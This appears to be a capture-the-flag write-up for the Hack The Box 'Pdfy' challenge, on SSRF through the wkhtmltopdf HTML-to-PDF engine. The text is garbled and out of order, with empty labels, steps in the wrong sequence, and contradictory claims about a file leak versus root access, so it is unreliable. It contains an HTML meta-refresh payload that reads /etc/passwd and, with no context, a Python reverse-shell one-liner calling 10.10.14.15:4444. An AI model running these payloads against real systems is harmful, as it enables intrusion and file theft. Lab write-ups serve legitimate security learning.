Pdfy HTB Writeup (Updated)
With the server running, paste the public URL of your script into the application's input field:
The challenge on Hack The Box (HTB) is an easy-rated web challenge focused on Server-Side Request Forgery (SSRF) and the exploitation of a vulnerable third-party component, specifically the HTML-to-PDF engine wkhtmltopdf.
Exposing Your Local Web Server
As noted in the official HTB discussion, beginners often overcomplicate this by trying to get a shell, but the goal is purely a file leak.
Inputting local loopback addresses like http://127.0.0.1 or http://localhost triggers an error or blocks the request. This reveals a basic blocklist filter on input strings.

Step 2: Source Code and API Discovery
After successfully generating the malicious PDF using any of the methods above, the contents of /etc/passwd will be displayed within the PDF. The flag for the challenge is embedded within this output. It will be a string formatted similarly to HTB... . The exact format and location can vary, so carefully scan the PDF's text content. Many walkthroughs note that the flag can be found immediately after a successful exploit.
<!DOCTYPE html>
<html>
  <head>
    <meta http-equiv="refresh" content="0; url=file:///etc/passwd" />
  </head>
  <body>
    <p>Redirecting...</p>
  </body>
</html>
When accessing the web target, you are met with a clean user interface containing a single input box labeled .
This guide serves as an updated writeup for the machine (UPD 2026), walking through the enumeration, exploitation, and post-exploitation phases to gain root access.

1. Machine Information and Setup

Machine Name: Pdfy
Platform: Hack The Box
Difficulty: Easy/Medium
Write a custom to automate fetching the PDF and parsing out the text.
: In PDFy, the goal is often to read local files or reach internal services.
: Prevent following redirects to non-internal hosts.
Sandbox: Run the service in an isolated environment.
"cmd": "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.15\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"]);'"
Nothing interesting, but the /uploads directory stores converted PNGs.